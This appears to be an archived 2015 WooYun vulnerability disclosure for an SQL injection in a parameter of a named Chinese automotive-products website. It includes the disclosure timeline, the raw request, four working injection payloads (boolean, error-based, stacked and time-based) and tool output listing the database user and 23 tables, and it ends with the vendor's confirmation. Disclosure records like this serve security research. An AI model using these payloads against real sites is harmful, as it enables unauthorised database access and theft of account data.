乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-24: 细节已通知厂商并且等待厂商处理中 2015-06-25: 厂商已经确认,细节仅向厂商公开 2015-07-05: 细节向核心白帽子及相关领域专家公开 2015-07-15: 细节向普通白帽子公开 2015-07-25: 细节向实习白帽子公开 2015-08-09: 细节向公众公开
233
GET /index.php?brand_id=0&page=1&pro_oil_capacity=0&pro_oil_class_acea=0&pro_oil_class_api=0&pro_oil_price=7&pro_oil_type=0&pro_oil_viscosity=1&r=product/oil HTTP/1.1X-Requested-With: XMLHttpRequestReferer: yongpin.xgo.com.cnCookie: Host: yongpin.xgo.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept: */*
---Parameter: pro_oil_viscosity (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: brand_id=0&page=1&pro_oil_capacity=0&pro_oil_class_acea=0&pro_oil_class_api=0&pro_oil_price=7&pro_oil_type=0&pro_oil_viscosity=-2818') OR 7628=7628#&r=product/oil Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: brand_id=0&page=1&pro_oil_capacity=0&pro_oil_class_acea=0&pro_oil_class_api=0&pro_oil_price=7&pro_oil_type=0&pro_oil_viscosity=-5232') OR 1 GROUP BY CONCAT(0x7162767071,(SELECT (CASE WHEN (6305=6305) THEN 1 ELSE 0 END)),0x7171717071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&r=product/oil Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: brand_id=0&page=1&pro_oil_capacity=0&pro_oil_class_acea=0&pro_oil_class_api=0&pro_oil_price=7&pro_oil_type=0&pro_oil_viscosity=1');(SELECT * FROM (SELECT(SLEEP(5)))abOi)#&r=product/oil Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment) Payload: brand_id=0&page=1&pro_oil_capacity=0&pro_oil_class_acea=0&pro_oil_class_api=0&pro_oil_price=7&pro_oil_type=0&pro_oil_viscosity=1') AND (SELECT * FROM (SELECT(SLEEP(5)))TWJi)#&r=product/oil---web application technology: Apacheback-end DBMS: MySQL 5.0.11current user: '[email protected]'Database: xgo_yongpin[23 tables]+--------------------+| x_admin_user || x_article || x_article_text_1 || x_attribute || x_brand || x_category || x_comment || x_dealer_info || x_dealer_intro || x_dealer_user || x_log_admin_login || x_log_dealer_login || x_parameter || x_pro_description || x_product_autoid || x_product_gps || x_product_oil || x_product_parts || x_product_paster || x_product_public || x_product_shoe || x_public_pic || x_series |+--------------------+
~~~~~~~~~
危害等级:中
漏洞Rank:10
确认时间:2015-06-25 09:43
感谢,正在修复中
暂无